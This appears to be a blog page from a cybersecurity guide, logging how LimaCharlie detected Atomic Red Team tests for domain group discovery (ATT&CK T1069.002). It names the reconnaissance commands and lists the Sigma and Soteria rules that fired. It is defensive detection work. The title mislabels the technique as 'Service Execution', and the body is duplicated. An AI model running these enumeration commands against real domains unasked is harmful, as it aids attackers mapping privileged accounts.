CYBERSECURITY JOB HUNTING GUIDE
T1069.002 Service Execution
Author: Stefan Waldvogel
LimaCharlie vs. Service Execution
Overview:
Description from ATT&CK
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.
source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1069.002 -ShowDetailsBrief
Invoke-AtomicTest T1069.002 -CheckPrereqs
Invoke-AtomicTest T1069.002 -GetPrereqs
Invoke-AtomicTest T1069.002
Invoke-AtomicTest T1069.002 -Cleanup
This test contains 8 sub tests
Changes:
-none-
Limitations:
-I am not actively logging LDAP or AD-
Creating a GPO on the server and enabling a better logging could help.
Result:
Invoke-AtomicTest T1069.002 -TestNumbers 1, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 2, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 3, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 4, sigma, soteria 00269-WIN-Powershell_With_URL_In_Commandline
Invoke-AtomicTest T1069.002 -TestNumbers 5, sigma. soteria 00048-WIN-Powershell_Invoke-WebRequest_Usage, LDAP access not detected, logging on the server?
Invoke-AtomicTest T1069.002 -TestNumbers 6 sigma, soteria, detected, but not the LDAP request itself
Invoke-AtomicTest T1069.002 -TestNumbers 7, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 8, sigma AdFind Usage Detection
Description from ATT&CK
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Commands such as net group /domain of the Net utility, dscacheutil -q group on macOS, and ldapsearch on Linux can list domain-level groups.
source: github.com/redcanaryco/atomic-red-team/tree/master/atomics
Commands:
Invoke-AtomicTest T1069.002 -ShowDetailsBrief
Invoke-AtomicTest T1069.002 -CheckPrereqs
Invoke-AtomicTest T1069.002 -GetPrereqs
Invoke-AtomicTest T1069.002
Invoke-AtomicTest T1069.002 -Cleanup
This test contains 8 sub tests
Changes:
-none-
Limitations:
-I am not actively logging LDAP or AD-
Creating a GPO on the server and enabling a better logging could help.
Result:
Invoke-AtomicTest T1069.002 -TestNumbers 1, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 2, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 3, sigma, Net.exe Execution
Invoke-AtomicTest T1069.002 -TestNumbers 4, sigma, soteria 00269-WIN-Powershell_With_URL_In_Commandline
Invoke-AtomicTest T1069.002 -TestNumbers 5, sigma. soteria 00048-WIN-Powershell_Invoke-WebRequest_Usage, LDAP access not detected, logging on the server?
Invoke-AtomicTest T1069.002 -TestNumbers 6 sigma, soteria, detected, but not the LDAP request itself
Invoke-AtomicTest T1069.002 -TestNumbers 7, sigma detected the powershell
Invoke-AtomicTest T1069.002 -TestNumbers 8, sigma AdFind Usage Detection
© 2021. This work is licensed under a CC BY-SA 4.0 license